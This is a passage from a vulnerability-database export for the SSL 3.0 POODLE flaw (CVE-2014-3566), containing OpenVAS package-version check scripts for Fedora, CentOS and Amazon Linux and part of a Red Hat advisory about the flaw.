\"insight\", value: \"Claws Mail is an email client (and news reader), based on GTK+, featuring\nquick response, graceful and sophisticated interface, easy configuration,\nintuitive operation, abundant features, and extensibility.\n\");\n script_tag(name: \"affected\", value: \"claws-mail on Fedora 19\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-14237\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147484.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"claws-mail\", rpm:\"claws-mail~3.11.1~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-08-04T10:48:46", "references": ["http://lists.centos.org/pipermail/centos-announce/2014-October/020696.html", "2014:1653"], "pluginID": "1361412562310882063", "description": "Check the version of openssl", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-10-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "CentOS Update for openssl CESA-2014:1653 centos5 ", "type": "openvas", "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2017-07-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882063", "id": "OPENVAS:1361412562310882063", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl CESA-2014:1653 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882063\");\n script_version(\"$Revision: 6769 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-20 11:56:33 +0200 (Thu, 20 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-17 05:58:51 +0200 (Fri, 17 Oct 2014)\");\n script_cve_id(\"CVE-2014-3566\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"CentOS Update for openssl CESA-2014:1653 centos5 \");\n\n script_tag(name: \"summary\", value: \"Check the version of openssl\");\n\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n\n script_tag(name: \"insight\", value: \"OpenSSL is a toolkit that implements\nthe Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram\nTransport Layer Security (DTLS) protocols, as well as a full-strength, general\npurpose cryptography library.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to mitigate the CVE-2014-3566 issue. For the\nupdate to take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\n\");\n script_tag(name: \"affected\", value: \"openssl on CentOS 5\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"CESA\", value: \"2014:1653\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2014-October/020696.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~31.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8e~31.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~0.9.8e~31.el5_11\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-08-02T10:48:40", "references": ["2014-15379", "https://lists.fedoraproject.org/pipermail/package-announce/2014-December/146233.html"], "pluginID": "1361412562310868604", "description": "Check the version of nodejs", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-12-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for nodejs FEDORA-2014-15379", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2017-07-18T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868604", "id": "OPENVAS:1361412562310868604", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nodejs FEDORA-2014-15379\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868604\");\n script_version(\"$Revision: 6750 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-18 11:56:47 +0200 (Tue, 18 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-15 05:56:50 +0100 (Mon, 15 Dec 2014)\");\n script_cve_id(\"CVE-2014-3566\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for nodejs FEDORA-2014-15379\");\n script_tag(name: \"summary\", value: \"Check the version of nodejs\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Node.js is a platform built on Chrome's JavaScript runtime\nfor easily building fast, scalable network applications.\nNode.js uses an event-driven, non-blocking I/O model that\nmakes it lightweight and efficient, perfect for data-intensive\nreal-time applications that run across distributed devices.\n\");\n script_tag(name: \"affected\", value: \"nodejs on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-15379\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/146233.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"nodejs\", rpm:\"nodejs~0.10.33~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-04T14:13:06", "references": ["2014-15390", "https://lists.fedoraproject.org/pipermail/package-announce/2014-December/146244.html"], "pluginID": "1361412562310868601", "description": "Check the version of nodejs", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-12-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for nodejs FEDORA-2014-15390", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2017-08-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868601", "id": "OPENVAS:1361412562310868601", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nodejs FEDORA-2014-15390\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868601\");\n script_version(\"$Revision: 6995 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-23 13:52:03 +0200 (Wed, 23 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-15 05:56:45 +0100 (Mon, 15 Dec 2014)\");\n script_cve_id(\"CVE-2014-3566\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for nodejs FEDORA-2014-15390\");\n script_tag(name: \"summary\", value: \"Check the version of nodejs\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Node.js is a platform built on Chrome's JavaScript runtime\nfor easily building fast, scalable network applications.\nNode.js uses an event-driven, non-blocking I/O model that\nmakes it lightweight and efficient, perfect for data-intensive\nreal-time applications that run across distributed devices.\n\");\n script_tag(name: \"affected\", value: \"nodejs on Fedora 19\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-15390\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/146244.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"nodejs\", rpm:\"nodejs~0.10.33~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-26T08:48:38", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143135.html", "2014-14234"], "pluginID": "1361412562310868471", "description": "Check the version of claws-mail", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-11-11T00:00:00", "title": "Fedora Update for claws-mail FEDORA-2014-14234", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2017-07-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868471", "id": "OPENVAS:1361412562310868471", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for claws-mail FEDORA-2014-14234\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868471\");\n script_version(\"$Revision: 6663 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-11-11 06:21:35 +0100 (Tue, 11 Nov 2014)\");\n script_cve_id(\"CVE-2014-3566\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for claws-mail FEDORA-2014-14234\");\n script_tag(name: \"summary\", value: \"Check the version of claws-mail\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Claws Mail is an email client (and news reader), based on GTK+, featuring\nquick response, graceful and sophisticated interface, easy configuration,\nintuitive operation, abundant features, and extensibility.\n\");\n script_tag(name: \"affected\", value: \"claws-mail on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-14234\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143135.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"claws-mail\", rpm:\"claws-mail~3.11.1~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:48:22", "references": ["https://alas.aws.amazon.com/ALAS-2014-426.html"], "pluginID": "1361412562310120188", "description": "Amazon Linux Local Security Checks", "edition": 3, "reporter": "Eero Volotinen", "published": "2015-09-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "title": "Amazon Linux Local Check: ALAS-2014-426", "type": "openvas", "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120188", "id": "OPENVAS:1361412562310120188", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Amazon Linux security check \n# $Id: alas-2014-426.nasl 6637 2017-07-10 09:58:13Z teissa $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@iki.fi> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.120188\");\nscript_version(\"$Revision: 6637 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-08 13:19:31 +0200 (Tue, 08 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 11:58:13 +0200 (Mon, 10 Jul 2017) $\");\nscript_name(\"Amazon Linux Local Check: ALAS-2014-426\");\nscript_tag(name: \"insight\", value: \"Bodo Moller, Thai Duong and Krzysztof Kotowicz of Google discovered a flaw in the design of SSL version 3.0 that would allow an attacker to calculate the plaintext of secure connections, allowing, for example, secure HTTP cookies to be stolen.http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.htmlhttps://www.openssl.org/~bodo/ssl-poodle.pdfSpecial notes:We have backfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI repositories with updated openssl packages that fix CVE-2014-3566 .For 2014.09 Amazon Linux AMIs, openssl-1.0.1i-1.79.amzn1 addresses this CVE. Running yum clean all followed by yum update openssl will install the fixed package.For Amazon Linux AMIs locked to the 2014.03 repositories, openssl-1.0.1i-1.79.amzn1 also addresses this CVE. Running yum clean all followed by yum update openssl will install the fixed package.For Amazon Linux AMIs locked to the 2013.09 or 2013.03 repositories, openssl-1.0.1e-4.60.amzn1 addresses this CVE. Running yum clean all followed by yum update openssl will install the fixed package.If you are using a pre-2013.03 Amazon Linux AMI, we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.\"); \nscript_tag(name : \"solution\", value : \"Run yum update openssl to update your system. Note that you may need to run yum clean all first.\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://alas.aws.amazon.com/ALAS-2014-426.html\");\nscript_cve_id(\"CVE-2014-3566\");\nscript_tag(name:\"cvss_base\", value:\"4.3\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Amazon Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1i~1.79.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1i~1.79.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1i~1.79.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1i~1.79.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1i~1.79.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-26T08:48:31", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2014-November/142782.html", "2014-13781"], "pluginID": "1361412562310868455", "description": "Check the version of subscription-manager", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-11-07T00:00:00", "title": "Fedora Update for subscription-manager FEDORA-2014-13781", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2017-07-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868455", "id": "OPENVAS:1361412562310868455", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for subscription-manager FEDORA-2014-13781\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868455\");\n script_version(\"$Revision: 6663 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-11-07 06:17:18 +0100 (Fri, 07 Nov 2014)\");\n script_cve_id(\"CVE-2014-3566\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for subscription-manager FEDORA-2014-13781\");\n script_tag(name: \"summary\", value: \"Check the version of subscription-manager\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The Subscription Manager package provides programs and libraries to allow users\nto manage subscriptions and yum repositories from the Red Hat entitlement\nplatform.\n\");\n script_tag(name: \"affected\", value: \"subscription-manager on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-13781\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/142782.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"subscription-manager\", rpm:\"subscription-manager~1.13.6~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "redhat": [{"lastseen": "2018-06-07T05:58:24", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.22.3.4-1.el6op", "arch": "noarch", "packageName": "openshift-origin-node-proxy", "packageFilename": "openshift-origin-node-proxy-1.22.3.4-1.el6op.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.22.3.4-1.el6op", "arch": "src", "packageName": "openshift-origin-node-proxy", "packageFilename": "openshift-origin-node-proxy-1.22.3.4-1.el6op.src.rpm", "operator": "lt"}], "description": "OpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or private\ncloud deployments.\n\nNode.js is a software development platform for building fast and scalable\nnetwork applications in the JavaScript programming language.\n\nA flaw was found in the way SSL 3.0 handled padding bytes when decrypting\nmessages encrypted using block ciphers in cipher block chaining (CBC) mode.\nThis flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected\nbyte of a cipher text in as few as 256 tries if they are able to force a\nvictim application to repeatedly send the same data over newly created SSL\n3.0 connections. (CVE-2014-3566)\n\nAll OpenShift Enterprise users are advised to upgrade to these updated\npackages, which correct this issue.\n", "reporter": "RedHat", "published": "2015-08-04T04:00:00", "type": "redhat", "title": "(RHSA-2015:1545) Important: node.js security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T08:57:38", "id": "RHSA-2015:1545", "href": "https://access.redhat.com/errata/RHSA-2015:1545", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-09T07:19:14", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "enchantments_done": [], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i686", "packageFilename": "openssl-debuginfo-0.9.8e-31.el5_11.i686.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "i386", "packageFilename": "openssl-debuginfo-0.9.8e-31.el5_11.i386.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "src", "packageFilename": "openssl-0.9.8e-31.el5_11.src.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "0.9.8e-31.el5_11", "arch": "x86_64", "packageFilename": 